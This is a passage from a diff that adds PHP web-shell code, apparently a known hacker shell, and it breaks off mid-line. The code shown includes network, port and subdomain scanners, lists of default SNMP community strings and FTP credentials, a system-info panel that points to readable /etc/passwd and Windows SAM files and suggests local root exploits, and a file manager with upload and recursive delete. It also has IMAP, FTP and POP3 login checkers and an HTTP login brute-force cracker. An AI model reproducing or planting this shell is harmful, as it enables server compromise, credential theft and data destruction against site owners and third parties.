+if(ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) System type: ".ftp_systype($ftp)." (<b><a href='";echo hlinK("seC=ftpc&workingdiR=".getcwd()."&hosT=$ip&useR=$user&pasS=$pass");echo "' target='_blank'>Connect</a></b>)<br>";}
+}
+}
+}
+}
+if($output)echo '<hr size=1 noshade>';
+}
+$time=time()-$start;
+echo "Done! ($time seconds)</font>";
+if(!empty($buglist))unlink($buglist);
+}
+elseif(!empty($_REQUEST['directoryscanner'])){
+$dir=file($_REQUEST['dic']);$host=$_REQUEST['host'];$r=$_REQUEST['r1'];
+echo "<font color=blue><pre>Scanning started...\n";
+for($i=0;$i<count($dir);$i++){
+$d=trim($dir[$i]);
+if($r){
+$adr="http://$host/$d/";
+if(check_urL($adr,'GET','302')){echo "Directory Found: <a href='$adr' target='_blank'>$adr</a>\n";}
+}else{
+$adr="$d.$host";
+$ip=gethostbyname($adr);
+if($ip!=$adr){echo "Subdomain Found: <a href='http://$adr' target='_blank'>$adr($ip)</a>\n";}
+}
+}
+echo 'Done!</pre></font>';
+}
+else{
+$t="<br><table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='50%'><tr><form method='POST'";
+$chbox=(extension_loaded('sockets'))?"<input type=checkbox style='border-width:1px;background-color:#808080;' name=tcp value=1 checked>TCP<input type=checkbox name=udp style='border-width:1px;background-color:#808080;' value=1 checked>UDP":"<input type=hidden name=tcp value=1>";
+echo "<center>$t><td>Port scanner:</td></tr><td width='25%' bgcolor='#808080'>Target:</td><td bgcolor='#808080' width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor='#666666' width=25%>From:</td><td bgcolor='#666666' width=25%><input name=fromport type=text value='1' size=5></td></tr><tr><td bgcolor='#808080' width=25%>To:</td><td bgcolor='#808080' width=25%><input name=toport type=text value='1024' size=5></td></tr><tr><td width='25%' bgcolor='#666666'>Timeout:</td><td bgcolor='#666666'><input name=timeout type=text value='2' size=5></td><tr><td width='25%' bgcolor='#808080'>$chbox</td><td bgcolor='#808080' align='right'>$hcwd<input type=submit class=buttons name=portscanner value=Scan></form>$et$t><td>Discoverer:</td></tr><tr><td width='25%' bgcolor='#808080'>Host:</td><td bgcolor='#808080' width=80%><input name=host value='".$_SERVER["HTTP_HOST"]."' size=40></td><td bgcolor='#808080'></td></tr><tr><td width='25%' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width=80%><input name=dic size=40></td><td bgcolor='#666666'></td></tr><tr><td width='25%' bgcolor='#808080'>Search for:</td><td bgcolor='#808080' width=40%><input type=radio value=1 checked name=r1>Directories<input type=radio name=r1 value=0>Subdomains</td><td bgcolor='#808080' align='right' width=40%><input type=submit class=buttons name=directoryscanner value=Scan></td></form></tr></table>";
+$host=substr($host,0,strrpos($host,"."));
+echo "$t name=security><td>Security scanner:</td></tr><td width='25%' bgcolor='#808080'>From:</td><td bgcolor='#808080' width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style='border-width:1px;background-color:#808080;' name=nslookup checked>NS lookup</td></tr><tr><td bgcolor='#666666' width=25%>To:</td><td bgcolor='#666666' width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width='25%' bgcolor='#808080'>Timeout:</td><td bgcolor='#808080'><input name=timeout type=text value='2' size=5></td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ipscanner value=1 checked onClick='document.security.port.disabled = !document.security.port.disabled;' style='border-width:1px;background-color:#666666;'>Port scanner:</td><td bgcolor='#666666'><input name=port type=text value='21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=httpbanner value=1 checked style='border-width:1px;background-color:#808080;'>Get web banner</td><td bgcolor='#808080'><input type=checkbox name=httpscanner value=1 checked style='border-width:1px;background-color:#808080;'>Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style='border-width:1px;background-color:#808080;'>SMTP relay check</td></tr><tr><td width='25%' bgcolor='#666666'><input type=checkbox name=ftpscanner value=1 checked onClick='document.security.userpass.disabled = !document.security.userpass.disabled;' style='border-width:1px;background-color:#666666;'>FTP password:</td><td bgcolor='#666666'><input name=userpass type=text value='anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]' size=60></td></tr><tr><td width='25%' bgcolor='#808080'><input type=checkbox name=snmpscanner value=1 onClick='document.security.com.disabled = !document.security.com.disabled;' checked style='border-width:1px;background-color:#808080;'>SNMP:</td><td bgcolor='#808080'><input name=com type=text value='public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,sun,agent,manager,ibm,hello,switch,solaris,OrigEquipMfr,default,world,tech,mngt,tivoli,openview,community,snmp,SNMP,none,snmpd,Secret C0de,netman,security,pass,passwd,root,access,rmon,rmon_admin,hp_admin,NoGaH$@!,router,agent_steal,freekevin,read,read-only,read-write,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,IBM,apc,TENmanUFactOryPOWER,proxy,core,CISCO,regional,1234,2read,4changes' size=60></td></tr><tr><td width='25%' bgcolor='#666666'></td><td bgcolor='#666666' align='right'><input type=submit class=buttons name=securityscanner value=Scan></form>$et";
+}
+}
+function sysinfO(){
+global $windows,$disablefunctions,$cwd,$safemode;
+$t8="<td width='25%' bgcolor='#808080'>";
+$t6="<td width='25%' bgcolor='#666666'>";
+$mil="<a target='_blank' href='http://www.milw0rm.org/related.php?program=";
+$basedir=(ini_get('open_basedir') || strtoupper(ini_get('open_basedir'))=='ON')?'ON':'OFF';
+if(!empty($_SERVER['PROCESSOR_IDENTIFIER']))$CPU=$_SERVER['PROCESSOR_IDENTIFIER'];
+$osver=$tsize=$fsize='';
+$ds=implode(' ',$disablefunctions);
+if($windows){
+$osver='  ('.shelL('ver').')';
+$sysroot=shelL("echo %systemroot%");
+if(empty($sysroot))$sysroot=$_SERVER['SystemRoot'];
+if(empty($sysroot))$sysroot = getenv('windir');
+if(empty($sysroot))$sysroot = 'Not Found';
+if(empty($CPU))$CPU=shelL('echo %PROCESSOR_IDENTIFIER%');
+for($i=66;$i<=90;$i++){
+$drive=chr($i).':\\';
+if(is_dir($drive)){
+$fsize+=disk_free_space($drive);
+$tsize+=disk_total_space($drive);
+}
+}
+}else{
+$ap=shelL('whereis apache');
+if(!$ap)$ap='Unknow';
+$fsize=disk_free_space('/');
+$tsize=disk_total_space('/');
+}
+$xpl=rootxpL();if(!$xpl)$xpl='Not found.';
+$disksize='Used spase: '.showsizE($tsize-$fsize).' Free space: '.showsizE($fsize).' Total space: '.showsizE($tsize);
+if(empty($CPU))$CPU='Unknow';
+$os=php_uname();
+$osn=php_uname('s');
+if(!$windows){
+$ker=php_uname('r');
+$o=($osn=='Linux')?'Linux+Kernel':$osn;
+$os=str_replace($osn,"${mil}$o'>$osn</a>",$os);
+$os=str_replace($ker,"${mil}Linux+Kernel'>$ker</a>",$os);
+$inpa=':';
+}else{
+$sam=$sysroot."\\system32\\config\\SAM";
+$inpa=';';
+$os=str_replace($osn,"${mil}MS+Windows'>$osn</a>",$os);
+}
+$cuser=get_current_user();
+if(!$cuser)$cuser='Unknow';
+$software=str_replace('Apache',"${mil}Apache'>Apache</a>",$_SERVER['SERVER_SOFTWARE']);
+echo "<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'><tr><td>Server information:</td></tr><tr>${t6}Server:</td><td bgcolor='#666666'>".$_SERVER['HTTP_HOST'];if(!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr>${t8}Operation system:</td><td bgcolor='#808080'>$os$osver</td></tr><tr>${t6}Web server application:</td><td bgcolor='#666666'>$software</td></tr><tr>${t8}CPU:</td><td bgcolor='#808080'>$CPU</td></tr>${t6}Disk status:</td><td bgcolor='#666666'>$disksize</td></tr><tr>${t8}User domain:</td><td bgcolor='#808080'>";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr>${t6}User name:</td><td bgcolor='#666666'>$cuser</td></tr>";
+if($windows){
+echo "<tr>${t8}Windows directory:</td><td bgcolor='#808080'><a href='".hlinK("seC=fm&workingdiR=$sysroot")."'>$sysroot</a></td></tr><tr>${t6}Sam file:</td><td bgcolor='#666666'>";if(is_readable(($sam)))echo "<a href='".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."'>Readable</a>"; else echo 'Not readable';echo '</td></tr>';
+}
+else
+{
+echo "<tr>${t8}UID - GID:</td><td bgcolor='#808080'>".getmyuid().' - '.getmygid()."</td></tr><tr>${t6}Recommended local root exploits:</td><td bgcolor='#666666'>$xpl</td></tr><tr>${t8}Passwd file:</td><td bgcolor='#808080'>";
+if(is_readable('/etc/passwd'))echo "<a href='".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."'>Readable</a>";else echo'Not readable';echo "</td></tr><tr>${t6}${mil}cpanel'>cPanel</a>:</td><td bgcolor='#666666'>";$cp='/usr/local/cpanel/version';$cv=(file_exists($cp) && is_writable($cp))?trim(file_get_contents($cp)):'Unknow';echo "$cv (Log file: ";
+if(file_exists('/var/cpanel/accounting.log')){if(is_readable('/var/cpanel/accounting.log'))echo "<a href='".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."'>Readable</a>";else echo 'Not readable';}else echo 'Not found';echo ')</td></tr>';
+}
+echo "<tr>$t8${mil}PHP'>PHP</a> version:</td><td bgcolor='#808080'><a href='?=".php_logo_guid()."' target='_blank'>".PHP_VERSION."</a> (<a href='".hlinK("seC=phpinfo&workingdiR=$cwd")."'>more...</a>)</td></tr><tr>${t6}Zend version:</td><td bgcolor='#666666'>";if (function_exists('zend_version')) echo "<a href='?=".zend_logo_guid()."' target='_blank'>".zend_version().'</a>';else echo 'Not Found';echo "</td><tr>${t8}Include path:</td><td bgcolor='#808080'>".str_replace($inpa,' ',DEFAULT_INCLUDE_PATH)."</td><tr>${t6}PHP Modules:</td><td bgcolor='#666666'>";$ext=get_loaded_extensions();foreach($ext as $v){$i=phpversion($v);if(!empty($i))$i="($i)";$l=hlinK("exT=$v");echo "<a href='javascript:void(0)' onclick=\"window.open('$l','','width=300,height=200,scrollbars=yes')\">$v</a> $i ";}echo "</td><tr>${t8}Disabled functions:</td><td bgcolor='#808080'>";if(!empty($ds))echo "$ds ";else echo 'Nothing'; echo"</td></tr><tr>${t6}Safe mode:</td><td bgcolor='#666666'>$safemode</td></tr><tr>${t8}Open base dir:</td><td bgcolor='#808080'>$basedir</td></tr><tr>${t6}DBMS:</td><td bgcolor='#666666'>";$sq='';if(function_exists('mysql_connect')) $sq= "${mil}MySQL'>MySQL</a> ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL'>MSSQL</a> ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle'>Oracle</a> ";if(function_exists('sqlite_open')) $sq.= ' SQLite ';if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL'>PostgreSQL</a> ";if(function_exists('msql_connect')) $sq.= ' mSQL ';if(function_exists('mysqli_connect'))$sq.= ' MySQLi ';if(function_exists('ovrimos_connect')) $sq.= ' Ovrimos SQL ';if ($sq=='') $sq= 'Nothing'; echo "$sq</td></tr></table>";
+}
+function checksuM($file){
+global $et;
+echo "<table border=0 style='border-collapse: collapse' width='100%'><tr><td width='10%' bgcolor='#666666'><b>MD5:</b> <font color=#F0F0F0>".md5_file($file).'</font><br><b>SHA1:</b><font color=#F0F0F0>'.sha1_file($file)."</font>$et";
+}
+function listdiR($cwd,$task){
+$c=getcwd();
+$dh=opendir($cwd);
+while($cont=readdir($dh)){
+if($cont=='.' || $cont=='..')continue;
+$adr=$cwd.DIRECTORY_SEPARATOR.$cont;
+switch($task){
+case '0':if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";break;
+case '1':if(is_writeable($adr)){if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";}break;
+case '2':if(is_file($adr) &&  is_writeable($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";break;
+case '3':if(is_dir($adr) && is_writeable($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";break;
+case '4':if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";break;
+case '5':if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";break;
+case '6':if(preg_match('@'.$_REQUEST['search'].'@',$cont) || (is_file($adr) && preg_match('@'.$_REQUEST['search'].'@',file_get_contents($adr)))){if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";}break;
+case '7':if(strstr($cont,$_REQUEST['search']) || (is_file($adr) && strstr(file_get_contents($adr),$_REQUEST['search']))){if(is_file($adr))echo "[<a href='".hlinK("seC=edit&filE=$adr&workingdiR=$c")."'>$adr</a>]\n";if(is_dir($adr))echo "[<a href='".hlinK("seC=fm&workingdiR=$adr")."'>$adr</a>]\n";}break;
+case '8':{if(is_dir($adr))rmdir($adr);else unlink($adr);rmdir($cwd);break;}
+}
+if(is_dir($adr))listdiR($adr,$task);
+}
+}
+if(!checkfunctioN('posix_getpwuid')){function posix_getpwuid($u){return 0;}}
+if(!checkfunctioN('posix_getgrgid')){function posix_getgrgid($g){return 0;}}
+function filemanageR(){
+global $windows,$msgbox,$errorbox,$t,$et,$cwd,$hcwd;
+$table="<table border=0 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bgcolor='#333333' width='100%'>";
+$td1n="<td width='22%' bgcolor='#666666'>";
+$td2m="<td width='22%' bgcolor='#808080'>";
+$td1i="<td width='5%' bgcolor='#666666'>";
+$td2i="<td width='5%' bgcolor='#808080'>";
+$tdnr="<td width='22%' bgcolor='#800000'>";
+$tdw="<td width='22%' bgcolor='#006E00'>";
+if(!empty($_REQUEST['task'])){
+if(!empty($_REQUEST['search']))$_REQUEST['task']=7;
+if(!empty($_REQUEST['re']))$_REQUEST['task']=6;
+echo '<font color=blue><pre>';
+listdiR($cwd,$_REQUEST['task']);
+echo '</pre></font>';
+}else{
+if(!empty($_REQUEST['cP']) || !empty($_REQUEST['mV']) || !empty($_REQUEST['rN'])){
+if(!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){
+$title='Destination';
+$ad=(!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];
+$dis=(!empty($_REQUEST['cP']))?'Copy':'Move';
+}else{
+$ad=$_REQUEST['rN'];
+$title='New name';
+$dis='Rename';
+}
+if(!!empty($_REQUEST['deS'])){
+echo "<center><table border=0 style='border-collapse: collapse' width='40%'><tr><td width='100%' bgcolor='#333333'>$title:</td></tr><tr>$td1n<form method='POST'><input type=text value='";if(empty($_REQUEST['rN']))echo $cwd;echo "' size=60 name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value='".htmlspecialchars($ad)."' name=cp><input class=buttons type=submit value=$dis></form>$et</center>";
+}else{
+if(!empty($_REQUEST['rN']))rename($ad,$_REQUEST['deS']);
+else{
+copy($ad,$_REQUEST['deS']);
+if(!empty($_REQUEST['mV']))unlink($ad);
+}
+}
+}
+if(!empty($_REQUEST['deL'])){if(is_dir($_REQUEST['deL']))listdiR($_REQUEST['deL'],8);else unlink($_REQUEST['deL']);}
+if(!empty($_FILES['uploadfile'])){
+move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);
+echo "$msgbox<b>Uploaded!</b> File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et<br>";
+}
+$select="<select onChange='document.location=this.options[this.selectedIndex].value;'><option value='".hlinK("seC=fm&workingdiR=$cwd")."'>--------</option><option value='";
+if(!empty($_REQUEST['newf'])){
+if(!empty($_REQUEST['newfile'])){file_put_contents($_REQUEST['newf'],'');}
+if(!empty($_REQUEST['newdir'])){mkdir($_REQUEST['newf']);}
+}
+if($windows){
+echo "$table<td><b>Drives:</b> ";
+for($i=66;$i<=90;$i++){$drive=chr($i).':';
+if(is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title='$vol' href=".hlinK("seC=fm&workingdiR=$drive\\").">$drive\\</a>";}
+}
+echo $et;
+}
+echo "$table<form method='POST'><tr><td width='20%'><b>[ <a id='lk' style='text-decoration:none' href='#' onClick=\"HS('div');\">-</a> ] Location:</b><input type=text name=workingdiR size=135 value='$cwd'><input class=buttons type=submit value=Change></form>$et";
+$file=$dir=$link=array();
+if($dirhandle=opendir($cwd)){
+while($cont=readdir($dirhandle)){
+if(is_dir($cwd.DIRECTORY_SEPARATOR.$cont))$dir[]=$cont;
+elseif(is_file($cwd.DIRECTORY_SEPARATOR.$cont))$file[]=$cont;
+else $link[]=$cont;
+}
+closedir($dirhandle);
+sort($file);sort($dir);sort($link);
+echo "<div id='div'><table border=1 cellpadding=0 cellspacing=0 style='border-collapse: collapse' bordercolor='#282828' bgcolor='#333333' width='100%'><tr><td width='30%' bgcolor='#333333' align='center'>Name</td><td width='13%' bgcolor='#333333' align='center'>Owner</td><td width='12%' bgcolor='#333333' align='center'>Modification time</td><td width='12%' bgcolor='#333333' align='center'>Last change</td><td width='5%' bgcolor='#333333' align='center'>Info</td><td width='7%' bgcolor='#333333' align='center'>Size</td><td width='15%' bgcolor='#333333' align='center'>Actions</td></tr>";
+$i=0;
+foreach($dir as $dn){
+echo '<tr>';
+$i++;
+$own='Unknow';
+$owner=posix_getpwuid(fileowner($dn));
+$mdate=date('Y/m/d H:i:s',filemtime($dn));
+$adate=date('Y/m/d H:i:s',fileatime($dn));
+$diraction=$select.hlinK('seC=fm&workingdiR='.realpath($dn))."'>Open</option><option value='".hlinK("seC=fm&workingdiR=$cwd&rN=$dn")."'>Rename</option><option value='".hlinK("seC=fm&deL=$dn&workingdiR=$cwd")."'>Remove</option></select></td>";
+if($owner)$own="<a title=' Shell: ".$owner['shell']."' href='".hlinK('seC=fm&workingdiR='.$owner['dir'])."'>".$owner['name'].'</a>';
+if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
+if(is_writeable($dn))echo $tdw;elseif(!is_readable($dn))echo $tdnr;else echo $cl2;
+echo "<a href='".hlinK('seC=fm&workingdiR='.realpath($dn))."'>";
+if(strlen($dn)>45)echo substr($dn,0,42).'...';else echo $dn;echo '</a>';
+echo $cl1."$own</td>";
+echo $cl1."$mdate</td>";
+echo $cl1."$adate</td>";
+echo "</td>$cl1";echo "<a href='#' onClick=\"javascript:chmoD('$dn')\" title='Change mode'>";echo 'D';if(is_readable($dn))echo 'R';if(is_writeable($dn))echo 'W';echo '</a></td>';
+echo "$cl1------</td>";
+echo $cl2.$diraction;
+echo '</tr>';
+}
+foreach($file as $fn){
+echo '<tr>';
+$i++;
+$own='Unknow';
+$owner=posix_getpwuid(fileowner($fn));
+$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>Open</option><option value='".hlinK("seC=edit&filE=$fn&workingdiR=$cwd")."'>Edit</option><option value='".hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd")."'>Download</option><option value='".hlinK("seC=hex&filE=$fn&workingdiR=$cwd")."'>Hex view</option><option value='".hlinK("seC=img&filE=$fn&workingdiR=$cwd")."'>Image</option><option value='".hlinK("seC=inc&filE=$fn&workingdiR=$cwd")."'>Include</option><option value='".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."'>Checksum</option><option value='".hlinK("seC=fm&workingdiR=$cwd&cP=$fn")."'>Copy</option><option value='".hlinK("seC=fm&workingdiR=$cwd&mV=$fn")."'>Move</option><option value='".hlinK("seC=fm&deL=$fn&workingdiR=$cwd")."'>Remove</option></select></td>";
+$mdate=date('Y/m/d H:i:s',filemtime($fn));
+$adate=date('Y/m/d H:i:s',fileatime($fn));
+if($owner)$own="<a title='Shell:".$owner['shell']."' href='".hlinK('seC=fm&workingdiR='.$owner['dir'])."'>".$owner['name'].'</a>';
+$size=showsizE(filesize($fn));
+if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
+if(is_writeable($fn))echo $tdw;elseif(!is_readable($fn))echo $tdnr;else echo $cl2;
+echo "<a href='".hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."'>";
+if(strlen($fn)>45)echo substr($fn,0,42).'...';else echo $fn;echo '</a>';
+echo $cl1."$own</td>";
+echo $cl1."$mdate</td>";
+echo $cl1."$adate</td>";
+echo "</td>$cl1";echo "<a href='#' onClick=\"javascript:chmoD('$fn')\" title='Change mode'>";if(is_readable($fn))echo "R";if(is_writeable($fn))echo "W";if(is_executable($fn))echo "X";if(is_uploaded_file($fn))echo "U";echo "</a></td>";
+echo "$cl1$size</td>";
+echo $cl2.$fileaction;
+echo '</tr>';
+}
+foreach($link as $ln){
+$own='Unknow';
+$i++;
+$owner=posix_getpwuid(fileowner($ln));
+$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."'>Open</option><option value='".hlinK("seC=edit&filE=$ln&workingdiR=$cwd")."'>Edit</option><option value='".hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd")."'>Download</option><option value='".hlinK("seC=hex&filE=$ln&workingdiR=$cwd")."'>Hex view</option><option value='".hlinK("seC=img&filE=$ln&workingdiR=$cwd")."'>Image</option><option value='".hlinK("seC=inc&filE=$ln&workingdiR=$cwd")."'>Include</option><option value='".hlinK("seC=checksum&filE=$ln&workingdiR=$cwd")."'>Checksum</option><option value='".hlinK("seC=fm&workingdiR=$cwd&cP=$ln")."'>Copy</option><option value='".hlinK("seC=fm&workingdiR=$cwd&mV=$ln")."'>Move</option><option value='".hlinK("seC=fm&workingdiR=$cwd&rN=$ln")."'>Rename</option><option value='".hlinK("seC=fm&deL=$ln&workingdiR=$cwd")."'>Remove</option></select></td>";
+$mdate=date('Y/m/d H:i:s',filemtime($ln));
+$adate=date('Y/m/d H:i:s',fileatime($ln));
+if($owner)$own="<a title='Shell: ".$owner['shell']."' href='".hlinK('seC=fm&workingdiR='.$owner['dir'])."'>".$owner['name'].'</a>';
+echo '<tr>';
+$size=showsizE(filesize($ln));
+if(($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
+if(is_writeable($ln))echo $tdw;elseif(!is_readable($ln))echo $tdnr;else echo $cl2;
+echo "<a href='".hlinK("seC=openit&namE=$ln&workingdiR=$cwd")."'>";
+if(strlen($ln)>45)echo substr($ln,0,42).'...';else echo $ln;echo '</a>';
+echo $cl1."$own</td>";
+echo $cl1."$mdate</td>";
+echo $cl1."$adate</td>";
+echo "</td>${cl1}";echo "<a href='#' onClick=\"javascript:chmoD('$ln')\" title='Change mode'>L";if(is_readable($ln))echo "R";if (is_writeable($ln))echo "W";if(is_executable($ln))echo "X";echo "</a></td>";
+echo "$cl1$size</td>";
+echo $cl2.$linkaction;
+echo '</tr>';
+}
+}
+$dc=count($dir)-2;
+if($dc==-2)$dc=0;
+$fc=count($file);
+$lc=count($link);
+$total=$dc+$fc+$lc;
+$min=min(substr(ini_get('upload_max_filesize'),0,strpos(ini_get('post_max_size'),'M')),substr(ini_get('post_max_size'),0,strpos(ini_get('post_max_size'),'M'))).' MB';
+echo "</table></div>$table<tr><td><form method=POST>Find:<input type=text value=\$pass name=search><input type=checkbox name=re value=1 style='border-width:1px;background-color:#333333;'>Regular expressions <input type=submit class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value='fm' name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width='100%'><tr><td width='50%'><br><table bgcolor=#333333 border=0 width='65%'><td><b>Summery:</b>   Total: $total Directories: $dc Files: $fc Links: $lc$et<table bgcolor=#333333 border=0 width='65%'><td width='100%' bgcolor=";if (is_writeable($cwd)) echo '#006E00';elseif (!is_readable($cwd)) echo '#800000';else '#333333'; echo '>Current directory status: ';if (is_readable($cwd)) echo 'R';if (is_writeable($cwd)) echo 'W' ;echo "$et<table border=0 style='border-collapse: collapse' width='65%'><tr><td width='100%' bgcolor='#333333'>New:</td></tr><tr>$td1n<form method='POST'><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value='File'><input class=buttons type=submit name=newdir value='Folder'></form>$et</td><td width='50%'><br>${t}Upload:</td></tr><tr>$td1n<form method='POST' enctype='multipart/form-data'><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on this server is $min</form>$et$et";
+}
+}
+function imapchecK($host,$username,$password,$timeout){
+$sock=fsockopen($host,143,$n,$s,$timeout);
+$b=uniqid('NJ');
+$l=strlen($b);
+if(!$sock)return -1;
+fread($sock,1024);
+fputs($sock,"$b LOGIN $username $password\r\n");
+$res=fgets($sock,$l+4);
+fclose($sock);
+if($res=="$b OK")return 1;else return 0;
+}
+function ftpchecK($host,$username,$password,$timeout){
+$ftp=ftp_connect($host,21,$timeout);
+if(!$ftp)return -1;
+$con=ftp_login($ftp,$username,$password);
+if($con)return 1;else return 0;
+}
+function pop3checK($server,$user,$pass,$timeout){
+$sock=fsockopen($server,110,$en,$es,$timeout);
+if(!$sock)return -1;
+fread($sock,1024);
+fwrite($sock,"user $user\n");
+$r=fgets($sock);
+if($r{0}=='-')return 0;
+fwrite($sock,"pass $pass\n");
+$r=fgets($sock);
+fclose($sock);
+if($r{0}=='+')return 1;
+return 0;
+}
+function formcrackeR(){
+global $errorbox,$footer,$et,$hcwd;
+if(!empty($_REQUEST['start'])){
+if(isset($_REQUEST['loG'])&& !empty($_REQUEST['logfilE'])){$log=1;$file=$_REQUEST['logfilE'];}else $log=0;
+$url=$_REQUEST['target'];
+$uf=$_REQUEST['userf'];
+$pf=$_REQUEST['passf'];
+$sf=$_REQUEST['submitf'];
+$sv=$_REQUEST['submitv'];
+$method=$_REQUEST['method'];
+$fail=$_REQUEST['fail'];
+$dic=$_REQUEST['dictionary'];
+$type=$_REQUEST['combo'];
+$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:'';
+if(!file_exists($dic))die("$errorbox Can not open dictionary.$et$footer");
+$dictionary=fopen($dic,'r');
+echo '<font color=blue>Cracking started...<br>';
+while(!feof($dictionary)){
+if($type){
+$combo=trim(fgets($dictionary)," \n\r");
+$user=substr($combo,0,strpos($combo,':'));
+$pass=substr($combo,strpos($combo,':')+1);
+}else{
+$pass=trim(fgets($dictionary)," \n\r");
+}
+$url.="?$uf=$user&$pf=$pass&$sf=$sv";
+$res=check_urL($url,$method,$fail,12);
+if(!$res){echo "<font color=blue>U: $user P: $pass</font><br>";if($log)file_add_contentS($file,"U: $user P: $pass\r\n");if(!$type)break;}
+}
+fclose($dictionary);
+echo 'Done!</font><br>';
+}
+else echo "<center><table border=0 style='border-collapse: collapse' width='434'><tr><td width='174' bgcolor='#333333'>HTTP Form cracker:</td><td bgcolor='#333333' width='253'></td></tr><form method='POST' name=form><tr><td width='174' bgcolor='#666666'>Dictionary:</td><td bgcolor='#666666' width='253'><input type=text name=dictionary size=35></td></tr><tr><td width='174' bgcolor='#808080'>Dictionary type:</td><td bgcolor='#808080'><input type=radio name=combo checked value=0 onClick='document.form.user.disabled = false;' style='border-width:1px;background-color:#808080;'>Simple (P)<input type=radio value=1 name=combo onClick='document.form.user.disabled = true;' style='border-width:1px;background-color:#808080;'>Combo (U:P)</td></tr><tr><td width='174' bgcolor='#666666'>Username:</td><td bgcolor='#666666'><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width='174' bgcolor='#808080'>Action Page:</td><td bgcolor='#808080' width='253'><input type=text name=target value='http://".getenv('HTTP_HOST')."/login.php' size=35></td></tr><tr><td width='174' bgcolor='#666666'>Method:</td><td bgcolor='#666666' width='253'><select size='1' name='method'><option selected value='POST'>POST</option><option value='GET'>GET</option></select></td></tr><tr><td width='174' bgcolor='#808080'>Username field name:</td><td bgcolor='#808080' width='253'><input type=text name=userf value=user size=35></td></tr><tr><td width='174' bgcolor='#666666'>Password field name:</td><td bgcolor='#666666' width='253'><input type=text name=passf value=passwd size=35></td></tr><tr><td width='174' bgcolor='#808080'>Submit name:</td><td bgcolor='#808080' width='253'><input type=text value=login name=submitf size=35></td></tr><tr><td width='174' bgcolor='#666666'>Submit value:</td><td bgcolor='#666666' width='253'><input type=text value='Login' name=submitv size=35></td></tr><tr><td width='174' bgcolor='#808080'>Fail string:</td><td bgcolor='#808080' width='253'><input type=text name=fail value='Try again' size=35></td></tr><tr><td width='174' bgcolor='#666666'><input type=checkbox name=loG value=1 onClick='document.form.logfilE.disabled = 